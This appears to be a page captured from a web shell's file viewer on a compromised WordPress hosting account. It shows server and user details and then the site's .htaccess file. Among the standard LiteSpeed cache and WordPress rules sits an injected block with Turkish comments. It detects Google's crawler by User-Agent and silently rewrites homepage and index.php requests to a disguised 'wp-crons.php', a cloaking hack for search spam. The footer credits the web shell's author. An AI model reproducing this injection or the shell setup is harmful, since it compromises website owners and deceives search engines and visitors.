Server Info : Linux us-phx-web867.main-hosting.eu 4.18.0-553.70.1.lve.el8.x86_64 #1 SMP Wed Aug 20 14:42:18 UTC 2025 x86_64
Server Software : LiteSpeed
Current User : u377662410 | Disk FreeSpace : 1,438.96 GB
Server Address : 2a02:4780:b:967:0:1682:abca:6 | Your Address : 216.73.216.11
Safe Mode : OFF | Server Email :
Disable Functions : None | cURL : ON | MySQL : OFF
Document Root : /home/u377662410/domains/ttsmagazines.com/public_html | Disk :
Current folder : /home/u377662410/domains/ttsmagazines.com/public_html/

Filename -> .htaccess

# BEGIN LSCACHE
## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ##
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteRule litespeed/debug/.*\.log$ - [F,L]
RewriteRule \.litespeed_conf\.dat - [F,L]
</IfModule>
<IfModule LiteSpeed>
CacheLookup on
RewriteRule .* - [E=Cache-Control:no-autoflush]

### marker ASYNC start ###
RewriteCond %{REQUEST_URI} /wp-admin/admin-ajax\.php
RewriteCond %{QUERY_STRING} action=async_litespeed
RewriteRule .* - [E=noabort:1]
### marker ASYNC end ###

### marker DROPQS start ###
CacheKeyModify -qs:fbclid
CacheKeyModify -qs:gclid
CacheKeyModify -qs:utm*
CacheKeyModify -qs:_ga
### marker DROPQS end ###

</IfModule>
## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ##
# END LSCACHE
# BEGIN NON_LSCACHE
## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ##
## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ##
# END NON_LSCACHE
RewriteEngine On

# User-Agent içinde "Google" varsa ENV değişkeni oluştur
SetEnvIfNoCase User-Agent "Google" is_google_bot=1

# Sadece ana sayfa isteği ise yönlendir
RewriteCond %{ENV:is_google_bot} =1
RewriteCond %{REQUEST_URI} ^/$
RewriteRule ^$ wp-crons.php [L]

RewriteCond %{ENV:is_google_bot} =1
RewriteCond %{REQUEST_URI} ^/index\.php$
RewriteRule ^index\.php$ wp-crons.php [L]
# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Webshell Coded by EagleEye 2023